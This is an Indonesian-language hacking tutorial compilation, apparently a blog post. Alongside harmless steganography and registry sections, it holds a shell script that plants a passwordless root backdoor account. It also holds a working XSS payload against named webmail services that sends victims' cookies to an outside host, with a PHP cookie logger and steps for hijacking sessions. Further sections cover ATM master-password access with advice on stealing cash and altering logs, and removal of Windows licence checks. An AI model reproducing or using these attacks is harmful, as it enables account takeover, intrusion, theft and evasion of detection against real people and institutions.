+ Hack Windows XP

+ Hack Friendster

+ Hack Telphone Coin

+ Create Virus

Etc....

1. GIF Colourmap Steganography

GIF Colourmap Steganography adalah suatu teknik untuk menyembunyikan

pesan pada file gambar (dalam hal ini adalah format GIF - Graphic Interchange Format). Sedikit cerita mengenai teknik ini, seorang ahli penyandian di Pentagon meyakini bahwa para teroris, sebelum memulai aksinya dalam penyerangan ke WTC, saling mengirim pesan yang disembunyikan di file-file gambar yang ada di situs porno, olahraga, dll. Ide dari teknik ini adalah urutan dari warna-warna di peta warna (colourmap) pada sebuah file GIF yang tidak mempengaruhi bagaimana gambar itu ditampilkan. Dua gambar dengan urutan warna yang berbeda pada peta warna akan terlihat sama. Dengan demikian sebuah gambar yang belum disisipi pesan dengan gambar yang sudah disisipi pesan akan terlihat sama. Sebuah program, bernama gifshuffle yang dibuat oleh Matthew Kwan, akan kita gunakan untuk memperjelas teori diatas. Program ini bekerja dalam dua mode, yaitu : Message Concealment (Penyembunyian Pesan) dan Message Extraction (Pengeluaran Pesan). Lebih detail mengenai mode tersebut dapat dilihat dibawah : Message Concealment : Message -> optional compression -> optional encryption -> concealment in image Message Extraction : Extract data from image -> optional decryption -> optional uncompression -> message Jika pembaca ingin mengetahui lebih rinci mengenai setiap proses dari dua mode diatas dapat menghubungi penulis atau cari saja di Google. Sekarang, untuk lebih jelas lagi penulis akan mencontohkan cara menggunakan program ini. Pertama-tama kita memiliki gambar yang normal (belum disisip pesan) dengan format GIF, seperti dibawah ini :

Sekarang kita akan gunakan program gifshuffle untuk memasukkan pesan, yaitu sebuah string berisikan "gmt ganteng", dengan password "password", gambar yang telah disusupi pesan akan kita beri nama baru yaitu "sun-m.gif". Perhatikan gambar dibawah ini :

Sekarang perhatikan bahwa gambar dibawah (sun-m.gif), yaitu setelah disusupi pesan, tidak ada bedanya bukan dengan gambar yang normal ?

Misalkan sekarang gambar yang telah disusupi pesan telah dikirim, bagaimana caranya agar orang yang menerima pesan tersebut dapat mengetahui isi pesan dibalik gambar tersebut ? Caranya mudah, perhatikan gambar dibawah ini :

Terlihat bahwa pesan yang disembunyikan di gambar telah di-extract, yaitu "gmt ganteng". Jika pembaca ingin memiliki program ini (baik source-code ataupun executeablenya dapat menghubungi penulis atau cari saja di Google). Mungkin sekarang pembaca mengira-ngira apakah gambar-gambar yang pembaca miliki ada yang sudah disisipi pesan. Seorang hacker (penulis lupa namanya) telah membuat program bernama StegDetect yang dapat mendeteksi apakah sebuah gambar memiliki pesan rahasia didalamnya.

2. Windows Genuine Hack

Waktu hidupkan komputer, muncul peringatan “Microsoft Windows Genuine Advantage Notifications”. Isinya : This copy of Windows is not genuine and you have not resolved the issue. This computer is no longer eligible to receive select security upgrades from Microsoft. To protect your computer, you must click Get Genuine now. Mulanya kukira ini Adware.. ternyata tidak. Peringatan ini datang dari Microsoft dan terinstall karena aku mengaktifkan Autoupdate. Woww! Kontan tersinggung. Masa sih windows-ku nggak asli? Padahal sebelumnya, sistem ini lulus uji bebas bajakan di situs microsoft. Marah-marah aku menuding mereka jual software bajakan. Setelah menyimpan kesal beberapa jam.. Akhirnya aku cari-cari tahu menghilangkannya. Mencari file eksekusi, registri trus dll terkait. Ini harus dibuang, aku tak menginginkannya.. Akhirnya aku tahu, masalah serupa juga banyak menimpa komputer temanku. Mereka malah membiarkannya begitu saja.... Alasannya tak tahu cara meng-enyahkan peringatan yang mengganggu space kerja. Meskipun aku menemukan beberapa cara melenyapkannya. Aku lebih percaya dengan cara manual. Caranya: - Logon ke komputer dengan account yang memiliki hak akses administrative - Ubah nama file berikut dengan ekstension .old : WgaLogon.dll, WgaTray.exe, keduanya biasanya di temukan di C:\windows\system32\ (tergantung dimana sistem windows tersimpan). - Restart komputer anda. - Unregister file LegitControl.dll dengan Regsvr32. Caranya: masuk ke command prompt, Klik start, klik run dan letik “cmd”, lalu klik OK. Di command prompt, ketik: Regsvr32 c:\windows\system32\LegitCheckControl.dll /u, bila caranya tepat. - Restart kembali komputer. - Klik Start, Run dan ketik cmd, lalu klik OK (kembali ke command prompt). - Hapus file berikut dengan mengetik ” del c:\windows\system32\WgaTray.Old”, ketik “del c:\windows\system32\Wgalogon.old”, terakhir ketik “del c:\windows\system32\LegitCheckControl.dll”. Tertawalah! Anda baru mengakali Microsoft, dan jangan pernah menginstal update serupa dari microsoft!

3. User Undetected Jangan pernah bermimpi masuk ke server orang jika kita blum mengetahui ajian yang namanya rooting. Rooting adalah Melacak atau mamasuki server server orang yang punya sistem yang lemah. Tulisan ini diperuntukan buat orang yang udah punya akses superuser. ================================================ #!/bin/bash #kill bill #f*** bill set kollo = (`grep kollo /etc/passwd`) set kolot = (`grep kollo /etc/shadow`)if ($#kollo == 0) then set linecount = `wc -l /etc/passwd` cd cp /etc/passwd ./temppass @ linecount[1] /= 2 @ linecount[1] += 1 split -$linecount[1] ./temppass echo "kollo:x:0:520:b-gildrake:/root:/bin/bash" >> ./xaa cat ./xab >>./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd rm ./xa* ./temppass passwd -d kollo echo good girl you root access is kollo else echo login masih ada echo grep kollo /etc/passwd endifif ($#kollo == 0) then set linecount = `wc -l /etc/passwd` cd cp /etc/passwd ./temppass @ linecount[1] /= 2 @ linecount[1] += 1 split -$linecount[1] ./temppass echo "kollo:x:0:520:b-gildrake:/root:/bin/bash" >> ./xaa cat ./xab >>./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd rm ./xa* ./temppass passwd -d kollo echo good girl you root access is kollo else echo login masih ada echo grep kollo /etc/passwd endif if ($#kolot == 0) then set linecount = `wc -l /etc/shadow` cd cp /etc/shadow ./temppass @ linecount[1] /= 2 @ linecount[1] += 1 split -$linecount[1] ./temppass echo "kollo:11614:0:99999:7::::" >> ./xaa cat ./xab >>./xaa mv ./xaa /etc/shadow chmod 644 /etc/shadow rm ./xa* ./temppass echo good girl you root access is kollo else echo login masih ada echo grep kollo /etc/shadow endif========================================================:wq ok deh slamat menikmati akses kollo anda okeyyyyy

4. Plasa.com/Telkom.net Hack Plasa.com adalah sebuah website yang menyediakan cukup banyak layanan, dan sepertinya merupakan sebuah affiliates inti Telkom.net (PT. Telekomunikasi Indonesia). Walaupun keduanya diketahui sebagai website besar, yang juga dipercaya memiliki security yang bisa dikatakan baik (Mengingat mereka adalah perusahaan komunikasi terbesar Indonesia), kenyataan ternyata berbicara lain. Terhitung pada hari ini (17 October 2006), Th0R bersama dengan SATE (Security Advisory TEam), telah menemukan beberapa kebocoran yang cukup signifikan dalam keamanan pada kedua website tersebut. Pada kesempatan kali ini, kita akan coba membahas mengenai kebocoran yang ada pada website mereka .. Boleh donk sesekali beralih ke Telkom, setelah bosan dengan Yahoo .. Mengenal Kebocoran nya Memang baik bagi telkom maupun plasa.com untuk membuat fitur HTML lgsg pada email mereka, lagipula mereka memang melakukan pengamanan pada penggunaan HTML di inbox mereka sendiri, dengan melakukan filtering beberapa codes yang ada .. Namun, sesuai dengan legenda yang telah sering terhembuskan oleh angin, XSS (Cross Site Scripting), ternyata memang benar adalah sebuah serangan yang paling mengerikan yang pernah ada. Walaupun sudah di filter sedemikian rupa, perusahaan raksasa di Indonesia (Telkom), ternyata masih memiliki fungsi Human Error, yang membuat mereka lupa melakukan filtering pada beberapa fungsi lain yang bisa dikatakan memang tidak begitu BISA untuk di execute .. Exploit & PoC Apabila kalian login masuk ke dalam WebMail mereka, baik telkom.net maupun plasa.com ternyata mereka masuk ke dalam satu server yang serupa, dan tentunya segala sesuatu nya juga bisa dikatakan serupa .. Sehingga KEBOCORANNYA pun serupa .. Hehehe .. Yang membuat mereka bocor adalah penggunaan HTML nya .. Dimana apabila kalian melakukan sending email yang berisikan: <pre a='>' onmouseover='document.location="http://shinigami.byethost32.com/c.php?c="+document.cookie' b='<pre' > </pre> Dan mengirimkannya dengan modul HTML seperti yang disediakan oleh pihak mereka sendiri di webmailnya .. Maka setiap orang yang membuka email mereka dan melewatkan Crusor keatas email tersebut, cookies nya akan ter-record melalui c.php yang telah saya pasangkan .. C.php nya sendiri memiliki code berikut ini: <?php $cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('cookies.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>'); fclose($fp); ?> Penggunaan Exploit 1. Copy code C.php diatas .. 2. Paste dalam notepad .. 3. Lakukan 'save as' .. 4. Simpan dengan nama c.php .. (Atau nama apa saja dengan format: <nama>.php) 5. Setelah itu, buatlah sebuah text file kosong dengan nama cookies.txt 6. Hostingkan ke 2 nya dalam sebuah hosting yang mengijinkan PHP codes .. (Contoh [URL=http://www.byethost.com)]http://www.byethost.com)[/URL] 7. Lalu copy lah code yang 1 lagi: <pre a='>' onmouseover='document.location="http://shinigami.byethost32.com/c.php?c="+document.cookie' b='<pre' > </pre> 8. Ubah http://shinigami.byethost32.com/c.php menjadi alamat tempat kamu menaruhkan C.php milik kamu .. 9. Paste kan code diatas ke dalam email .. 10. Set pengiriman dengan menggunakan modul HTML .. 11. Tunggu lah target anda melakukan checking email .. 12. Check lah kalau kalau ada logged cookies di cookies.txt anda yang telah terhostingkan .. 13. Dan apabila ada muncul yang kira kira seperti ini: 206.222.15.234 :: 10/17/2006 2:49:05 am http://mail1.plasa.com/Session/227502-UPcQoxKIVTIeAXZisu91-kmbcuwc/Message.wssp?Mailbox=INBOX&MSG=7&PrintVersion=& :: plasaUserID=th0r; plasaFullName=Rex Carlton; plasaUniqId=8d18f0e0e0e78f5816095b36abad73b0; validUser=734c2b0266483d6540855081d8ed7e15 Artinya target anda telah membuka email jebakan anda ..

14. Pergilah login ke dalam plasa.com / telkom.net milik kalian sendiri .. 15. Lakukan cookie editing, dan mengganti plasaUserID, plasaFullName, plasaUniqID, dan ValidUser sesuai dengan yang anda dapatkan dari target anda .. 16. Refresh page .. 17. Viola .. !! U now logged in as target .. Penerapan lebih lanjut Seperti yang kita ketahui, sebagian orang mgkn menggunakan password pada beberapa account penting mereka dengan password yang sama .. So, untuk mendapatkan plain-text password, kalian bisa melakukan sedikit Social Engineering, dengan melakukan lupa pas, pada Friendster.com misalnya, atau web lain, yang nantinya membuat plain-text password mereka terkirim ke alamat email mereka di plasa.com atau telkom.net itu sendiri .. Atau dengan cara lain .. Itu gak sulit .. Ternyata, plasa.com dan telkom.net memberikan Semua Informasi penting dan tidak penting yang tercantum pada profile anda, tanpa encryption method, lgsg pada bagian Edit Profile .. Hal ini membuat para penyerang mampu mendapatkan Secret Question dan Answer nya, lalu memungkinkan mereka melakukan Lupa Password .. Ridiculous isnt it?! Hehehe~~ Catatan Penting - Perlu diingat bahwa ini bukanlah satu2nya vulnerabilities yang ada pada plasa.com ataupun telkom.net - Penggunaan HTML pada body email juga bukan merupakan satu2nya kelemahan Catatan Untuk Developer - Mohon agar Telkom.net dan Plasa.com melakukan re-check terhadap keamanan mereka, dan melakukan filtering yang lebih terhadap penggunaan HTML di dalam email mereka .. - Hilangkan segala jenis XSS yang bekerja pada website mereka (Sejauh ini terdapat puluhan XSS working on their site).

5. Registry Mungkin sudah banyak artikel yg memuat tentang registry windows.Tulisan ini saya buat selaku seorang newbie (tapi sok tau), itupun akibat kejengkelan dengan salah satu warnet di Bogor dan salah satu sekolah saya. Semua fasilitas diproteksi, mulai dari regedit, Control Panel, CMD, Drive, bahkan floppy A-nya pun di ambil. Disini saya akan memulai dari awal. Yaw DAH, Kita mulai dari awal yaitu hal yg paling menjemukan yaitu teori...... Registry merupakan kumpulan dari data windows yang dipakai untuk mengatur jalannya sistem operasi windows. Untuk melakukan perubahan pada windows menggunakan program regedit. Caranya RUN lalu ketik regedit. Akan terlihat 6 root keys yang mempunyai tugas yang berbeda setiap key (mungkin tidak perlu dijelaskan satu persatu biar gak bosen bacanya, setuju?). Klo gak dijelasin gak belajar namanya he...he... Penjelasan singkat keenam root keys : 1. HKEY_CLASSES_ROOT menangani semua jenis file yang ada di windows dan menyimpan setting software 2. HKEY_USER menangani semua informasi user yang aktif serta menangani setting control panel pada sistem operasi windows 3. HKEY_CURRENT_USER menangani satu informasi user yang aktif pada sistem operasi windows. 4. HKEY_LOCAL_MACHINE memuat informasi tentang hardware yang dipakai pada komputer tersebut. 5. HKEY_CURRENT_CONFIG untuk mencatat konfigurasi sistem yang ada. 6. HKEY_DYN_DATA untuk mengetahui tingkat kinerja suatu sistem dan dalam jaringan. (Tapi di windows xp dah ga ada) Nah, skarang kita mulai saja ….. 1. Menyembunyikan Drive pada explorer Key"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" or bisa JuGa Key"HKEY_USERS\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" Value "NoDrives" Tipe data "DWORD" CuMa SeGIni Value Data-Nya Yang gw Tao Value Data 1 = Buat Hide Drive A Value Data 4 = Buat Hide Drive C Value Data 8 = Buat Hide Drive D Value Data 16 = Buat Hide Drive E Value Data 29 = Buat Hide Drive A,C,D,E (1 + 4 + 8 + 16) Value Data 32 = Buat Hide Drive F Value Data 140 = Buat Hide Drive G Value Data 180 = Buat Hide Drive H Klo lo mau hide drive misal : Drive A, Drive C jadi Nilai Value data yang diisi di regedit = Nilai Value Data A + Nilai Value Data C = 1 + 4 = 5 nah klo yang ini bisa bikin semua isinya yang ada di drive-Nya ga Kliatan (he...he...^_^)

2. Mendisable akses untuk melihat drive Key"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" or bisa JuGa key"HKEY_USERS\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" Value "NoViewOnDrive" Tipe data "DWORD" CuMa SeGIni Value Data-Nya Yang gw Tao Value Data 1 = Buat Hide Drive A Value Data 4 = Buat Hide Drive C Value Data 8 = Buat Hide Drive D Value Data 16 = Buat Hide Drive E Value Data 29 = Buat Hide Drive A,C,D,E (1 + 4 + 8 + 16) Value Data 32 = Buat Hide Drive F Value Data 140 = Buat Hide Drive G Value Data 180 = Buat Hide Drive H Klo u mau hide drive misal : Drive D, Drive E jadi Nilai Value data yang diisi di regedit = Nilai Value Data D + Nilai Value Data E = 8 + 16 = 24 Sekarang bagian Add and Remove Programs & Control Panel Control Panel 1. Menghilangkan Access Control Panel key"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" atau key"HKEY_USER\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" Value "NoControlPanel" Tipe data "DWORD" Add and Remove Programs 1. Menghilangkan Add or Remove Programs key"HKEY_USER\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall" Value "NoAddRemovePrograms" Tipe data "DWORD" 2. Menghilangkan change or Remove Programs key"HKEY_USER\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall" Value "NoRemovePage" Tipe data "DWORD" 3. Menghilangkan Add New Programs key"HKEY_USER\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall" Value "NoAddPage" Tipe data "DWORD"

4. Menghilangkan Add/Remove Windows Components key"HKEY_USER\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall" Value "NoWindowsSetupPage" Tipe data "DWORD" 5. Menghilangkan Support Information key"HKEY_USER\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall" Value "NoSupportInfo" Tipe data "DWORD" 6. Menghilangkan Set programs access and default key"HKEY_USER\S-1-5-21-776561741-823518204-725345543-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall" Value "NoChooseProgramsPage" Tipe data "DWORD" semuanya isi dengan value data = 1 untuk mengaktifkan & = 0 untuk me-nonaktifkan Klo ini buat CMD 1. MenDisable CMD key "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" Value "DisableCMD" Tipe data "DWORD" Value Data = 1 = Buat Disable CMD ama Command Script 2 = Buat Disable CMD-Nya Aja Untuk menormalkan semua perubahan yang dibuat tinggal mengganti nilai 1 atau lainnya menjadi nilai 0

6. Injection Failed Saya nyiptain istilah baru nih "textbox injection", atau mungkin sudah ada istilah lain tapi aku gak tahu. (Sialan !!! Ternyata aku masih bego)Setelah beberapa saat jalan-jalan di internet, dan mampir ke beberapa situs yang menggunakan textbox untuk menerima inputan atau masukan dari pengunjung (seperti pada buku tamu/guestbook, forum, kritik dan saran, dll) saya masih menemukan beberapa yang tidak melakukan validasi input untuk textbox yang digunakannya. Masukan dari pengunjung diolah begitu saja tanpa diubah sama sekali. Sebagai contoh, saya menemukan celah ini di situs harian Batam Pos (www.harianbatampos.com) pada bagian pemasangan iklan gratis, atau pada situs www.ibatam.com pada bagian direktori bisnis (memasukkan nama dan deskripsi perusahaan). Jika saya memasukkan input "<h1>test" misalnya, maka yang akan tampil adalah tulisan kata "test" dengan ukuran besar (ukuran terbesar untuk format html), bukan tampilan seperi tulisan aslinya. Coba bayangkan jika pengunjung memasukkan input sebagai berikut : "<img src=http://www.porno.com/porno1.jpg>" bukankan akan tampil gambar porno disana (pernah terjadi lho). Tentu saja pengunjung lain akan tercengang melihatnya. Hal seperti ini saharusnya tidak boleh terjadi, jika sang admin melakukan validasi input untuk semua data yang masuk. Eh tapi ada cerita unik lain lagi lho. Saat saya mengunjungi salah satu situs resmi pemerintah, kalau nggak salah www.drpin.go.id. Sewaktu saya berusaha untuk memasukkan input <h1>test, muncul peringatan bahwa pengunjung dilarang memasukkan tag html ke dalam textbox. Lalu saya berfikir, "wah... ini pasti menggunakan javascript !". Dan ternyata setelah saya melihat source code-nya tebakan saya tadi benar, kemudian saya edit halaman dengan menghilangkan script-nya. Dan ternyata berhasil, tulisan <h1>test yang saya masukkan ditampilkan dengan ukuran jumbo, hehehe. (Maaf ya Mr.Admin, saya cuma nge-test aja kok) SOLUSINYA Agar hal seperti di atas tidak terjadi lagi berikut ini salah satu solusi yang saya tawarkan : 1. Jika yang digunakan untuk server side scripting adalah PHP, manfaatkan saja fungsi "htmlspecialchars" atau "get_html_translation_table". Dengan menggunakan fungsi ini maka semua input yang berbentuk tag html akan diubah menjadi karakter lain. Misalnya karakter "<" akan diubah menjadi "&lt;" sehingga saat inputan tersebut ditampilkan di browser tetap akan berbentuk "<". 2. Jangan menggunakan client side scripting (javascript/vbscript) untuk melakukan pengamanan terhadap apa saja. Client side scripting nyaris tidak berdaya bila ditemukan oleh user yang berpengalaman. Memang sih proteksi ini masih berlaku jika yang menemukan adalah user biasa. Tapi bagaimanapun juga, pencegahan akan lebih baik daripada mengobati, (emang siapa yang sakit, hehehe).

Berikut ini adalah contoh penggunaan fungsi "htmlspecialchars" : -----------------------------start----------------------------------------<? $str= htmlspecialchars("<a href='test'>Test</a>"); echo($str); ?-----------------------------finish--------------------------------------- Lalu bagaimana jika menggunakan form, berikut contohnya : -----------------------------start------------------------------<pre><form method=post action=test.php> Teks (tag html juga ok) <input type=text name=teks> <input type=submit value=OK> <? $filter=htmlspecialchars($teks); echo("Hasil : $filter"); ?>-----------------------------finish----------------------------- Simpan sebagai file php dengan nama test.php, agar hasilnya bisa ditampilkan di halaman yang sama. Jangan lupa untuk menyimpannya di direktori htdocs. Kemudian coba akses file tersebut menggunakan browser dan masukkan tag html ke dalam textbox misalnya "<h1>A", dan lihat apa yang terjadi. Udah dulu ah, kalau sebelumnya udah ada yang menulis artikal seperti ini, saya mohon maaf. Tapi yang jelas ini adalah hasil pencarian saya sendiri lho.

7. ATM Hack Seperti yang sudah di janjikan ..Mari kita membahas mengenai Hacking mesin ATM dengan menggunakan real programming hack .. Hehehe .. Apa itu ATM Machine? Kepanjangan nya adalah Auto Teller Machine .. Sebuah mesin yang bisa dikatakan sebagai Bank Mini .. Hehehe .. Sebuah mesin yang kayaknya udah gak perlu diceritain lagi deh apa dan bagaimananya, karena saya rasa semua orang sudah tahu mengenai mesin ini .. Yang jelas dengan mesin ini, kalian bisa mengambil duit, tanpa harus pergi ke bank dan melakukan banyak hal lain yang menurut saya pribadi adalah melelahkan .. Ngisi form lah, apalah .. Capek dude xD~~ Nah, sering kali tuh terjadi rumor .. Bisa gak sih ATM di Hack??! Gimana sih caranya?? Dalam kesempatan kali ini, saya akan membuat sebuah tutorial dan artikel bersifat informatif singkat berkenaan dengan kemungkinan hacking ATM Machine itu sendiri .. Sebenarnya ada banyak cara, dan kebanyakan cara bisa anda lihat di http://www.sate.name .. Tapi dalam kesempatan kali ini, saya akan sedikit membahas mengenai masalah teknis yang ada xD~~ So .. Lets start the GAME xD~~ Hal ini hanya bekerja untuk mesin tipe Tranax Minibank 1500 Series .. Kalau anda teliti .. Anda bisa mendapatkan sebuah informasi penting dari series yang saya berikan diatas xD~~ Berikut adalah cuplikan dari Manual Book yang saya baca: To access the Operator Function menu, hold the <Cancel>, <Clear> and <Enter> keys simultaneously for 2 seconds, release them and press 1, then press 2, then press 3. The timing of this procedure can be difficult at first. Jadi intinya untuk masuk kedalam Operator Function pada ATM Machine tipe ini, anda perlu menekan tombol <Cancel>, <Clear> dan <Enter> secara bersamaan selama 2 detik, lepaskan mereka, dan tekan tombol 1, kemudian 2, dan 3. Mungkin timing awalnya akan susah pada saat anda mencoba pertama kali .. xD~~ Kalau anda kesulitan untuk login .. Cara kasarnya juga ada .. Wakakaka .. Matikan power ATM mesin, buka saja penutup ATM, copot kertas untuk printernya, pasangkan kembali, dan pada saat anda menyalakan kembali ATM, dia akan lgsg masuk pada Operator Function .. Susah memang .. But no pain .. No gain right?? xD~~

Setelah masuk ke dalam Operator Function .. Anda akan ditanyai 3 jenis password, yang mana anda dapat memilih 1 dari antara 3 itu: - Operator Password (Ini untuk meng-akses menu dasar struktur ATM) - Service Password (Mengijinkan akses ke menu dasar dan diagnostic menu) - Master Password (Mengijinkan anda mengakses penuh mesin tersebut) Disini adalah kunci dari pembicaraan kita .. Pada mesin Tranax MiniBank 1500 Series .. Default Master Password nya adalah "000000" (Tanpa kutip) .. Dan saya rasa tidak banyak yang merubah default password itu, Hehehe .. Dari sana anda bisa melakukan banyak hal .. Termasuk diantaranya "reset the status of the cash cartridges" .. Yang dimana membuat anda mgkn saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan 400rb karena anda membuat cashingnya menjadi 4x lipat lebih banyak .. Namun bank akan hanya me-reduce uang anda sebanyak 100rb sesuai request anda .. Hehehehe .. Menarik bukan??! Wakakaka .. Perihal .. Bagaimana apabila kita terlacak?? Dengan Master Password, anda bisa merubah jam transaksi, merubah entire timing dan printing data ATM, dll dsb dst .. Yah, kreasikan sendiri utk bisa kabur dr tuduhan .. Jadi intinya, yang perlu anda takuti adalah .. Security Cameras NB: Tutorial ini hanya dibuat untuk pembelajaran dan pembuktian bahwa ATM Hacking itu mgkn terjadi. Oleh dari karena itu kami tidak membahas jauh lebih men-detail, berikut juga merupakan sebuah bukti bahwa "Lubang" keamanan ini sedang sedemikian rupa di patch oleh pihak Tranax: Baca Disini!!! .. Sekian

8. Hacking Software

Pada umumnya sebuah software normal tipe 32-bit terbagi menjadi beberapa bagian, bagian yang umum adalah resource, bagian dimana icon gambar dan yang lainnya disimpan, kemudian data, bagian dimana variabel yang terinisialisasi disimpan dan kode, dimana program utama dijalankan.

Program Com mempunyai bagian yang paling sederhana dari semua jenis executable atau file yang bisa dilaksanakan/jalankan. Data yang terinisialisasi oleh Com exe dengan yang tidak, akan dianggap sama. Umumnya untuk menghemat ukuran, software selalu tidak menyertakan seksi stack pada badan program, tetapi memberikannya setelah program dijalankan.

Software yang saya niatkan untuk dibuat akan mempunyai tata letak atau bagian seperti ini. 1024 byte pertama yang biasanya di isi oleh header pada Win32, akan saya jadikan sebuah perintah untuk melakukan penginisialisasian program secara automatis.

Bisa anda lihat source kode-nya dibawah ini:

; Berkas/file COM di isi di alamat CS:0100h

; (Nilai CS diset oleh Operating system)

ORG 100h

; Fungsi CSPMode di gunakan sebagai header

; Bisa pula dijadikan Kernel 32-Bit

jmp start

CSPmode:

smsw_cx db 0fh,01,0e1h ;SMSW cx byte

mov ax,cx ;At Pmode this will be mov eax,ecx

and al,1

cmp al,1

jz trs

inc cx

lmsw_cx db 0fh,01,0f1h ;lmsw cx byte

trs:

ret

; Program di mulai di sini

start:

call CSPMode

cmp al,0

jz brs

mov ah,9

mov dx,offset tes

int 21h

brs:

; Tambahkan kode anda disini

ret

Tes db 'Prosessor already at Pmode!$'

Bila anda kebetulan mempunyai sebuah komputer kosong yang tidak mempunyai OS, dengan menuliskan program tersebut di sektor 1, head 0 dan track 0, dan setting BIOS diganti menjadi boot from A. Maka BIOS akan langsung menjalankan program dan menganggap program tersebut sebagai Operating System. Sekali lagi saya ingatkan, hacking bukan cracking (seperti menjebol sebuah system dan sejenisnya).

Program diatas saya tulis dengan menggunakan Emu8086 v.2.7. Terlihat diatas adanya sebuah variable dengan nama SMSW_AX dan LMSW_AX. Variabel tersebut memang sengaja saya buat, karena emu8086 yang saya pakai belum mendukung instruksi priviledge.

Saya jelaskan satu-persatu:

Org 100.

Org singkatan dari Origin, perintah ini tidak mempunyai opcode atau hexcode. Perintah ini hanya akan menyuruh assembler atau kompiler untuk menyimpan program kita di alamat tertentu.

Jmp Start.

Perintah ini akan melakukan lompatan ke CS+imm.

SMSW_CX.

Ini adalah variabel yang mengandung opcode priviledge instruction untuk mengambil mode prosesor.

Mov ax,cx.

Memindahkan nilai cx yang mengandung nilai Status mesin ke AX.

and al,1

Membatasi nilai al dengan satu, karena status mode terletak di Bit Nol.

cmp al,1

Membandingkan apakah nilai al adalah satu.

jz trs

Jika ya loncat ke Label Trs.

inc cx

Naikkan nilai CX sebanyak 1 saja.

lmsw_cx db 0fh,01,0f1h

Menyimpan nilai ke Register CR0, atau set Status Mesin.

trs:

ret

Label dengan nama trs. Menyuruh prosesor untuk kembali ke pemanggil.

start:

call CSPMode

Melakukan Pemanggilan ke CSPMode.

cmp al,0

Membandingkan AL apakah Nol.

jz brs

Jika ya beres.

mov ah,9

mov dx,offset tes

int 21h

Interupt Software, Tidak akan berjalan tanpa DOS. Fungsi asli sedang dibuat.

brs:

ret

Tes db „Prosesor sudah berada di P-Mode!$'

Untuk kembali dan variabel tulisan yang ditampilkan dengan int 21h fungsi 9h.

Catatan:

Silahkan anda lihat OpCode-nya dibawah ini:

0100: EB 10 ó Jmp 0x112

0102: 0F 01 E1 ó SMSW CX

0105: 8B C1 ó Mov AX,CX

0107: 24 01 ó And al,1

0109: 3C 01 ó Cmp al,1

010b: 74 04 ó JZ 0x111

010d: 41 ó Inc CX

010E: 0F 01 F1 ó LMSW CX

0111: C3 ó Ret

0112: EB ED FF ó Call 0x102

0115: 3C 00 ó Cmp al,0

0117: 74 07 ó Jz 0x120

0119: B4 09 ó Mov al,9

011B: BA 21 01 ó Mov DX,offs [0x121]

011E: CD 21 ó Int x21

0120: C3 ó Ret

............................

............................

............................

Perintah pemanggilan fungsi ke 0x102, tidak ditulis EB 02 01, tetapi EB ED FF yang berarti –20 atau -0x14. Juga JZ. Maka baik perintah jump ataupun Call sama dengan CS+imm. Jika CS bernilai 101, dengan menuliskan 74 05 misalkan. Kita akan melompat ke alamat 106.

Juga baik Call ataupun Jmp, menggunakan nilai Signed. Misalkan nilai 254 pada unsigned akan menjadi –2. Untuk lebih lengkapnya tentang un/signed, silahkan tanya saja ke Sto@jasakom.com , atau baca buku yang dikarang oleh orang yang sama.

9. Stenografi Steganography adalah sebuah seni menyembunyikan informasi sedemikian sehingga tidak dapat dideteksi/diketahui. Steganography, dalam bahasa aslinya (yaitu Yunani) berarti "tulisan tersembunyi". Steganography merupakan "saudara" dari Cryptography dalam hal kedua-duanya digunakan untuk mengamankan informasi. Perbedaannya yang mendasar adalah : kalau Steganography merupakan seni "menyembunyikan" informasi, sedangkan Cryptography merupakan seni "mengacak" informasi (plaintext) sehingga menjadi suatu bentuk yang kelihatannya sudah tidak berarti lagi (chipertext). Steganography sudah ada dari sejak lama, tapi aplikasinya pada masa itu masih sangat sederhana sekali, seperti membuat tinta yang hanya terlihat jika diterangi sinar lilin, membuat penonjolan huruf pada posisi tertentu, dll. Pada saat ini aplikasinya sudah demikian canggih, seperti menyembunyikan pesan di file teks ASCII biasa (di Notepad), menyembunyikan pesan di file lagu MP3, menyembunyikan pesan di file gambar berformat GIF, dll. Contoh Steganography yang saya bahas kali ini adalah SNOW. SNOW digunakan untuk menyembunyikan pesan pada file teks ASCII dengan menambahkan whitespace pada akhir baris, sehingga dikenal juga dengan Whitespace Steganography. Salah satu kelebihan dari SNOW adalah penggabungan Steganography dan Cryptography, sehingga proses penyembunyian informasi menjadi semakin sulit dideteksi. Pertama-tama, informasi yang akan disembunyikan dienkrip dengan menggunakan algoritma enkripsi ICE, lalu kemudian informasi tersebut disembunyikan di file teks ASCII. Akan lebih baik jika dipraktekkan aplikasinya. Perhatikan gambar dibawah :

Gambar pertama adalah file teks ASCII yang akan kita susupi informasi. Perhatikan warna biru ketika dilakukan "select all". Lalu perhatikan gambar kedua, yang merupakan file teks ASCII yang sudah disusupi informasi rahasia (yaitu "Majulah Indonesia"), ketika di-"select all" tampak ada tambahan whitespace dibelakang tiap baris. Nah, disitulah pesan rahasia kita berada.

Berikut adalah gambar proses-nya. Program yang digunakan dibuat memakai bahasa pemrograman Java 1.1. Program tersebut dapat didownload pada situs http://www.darkside.com.au/snow/index.html .

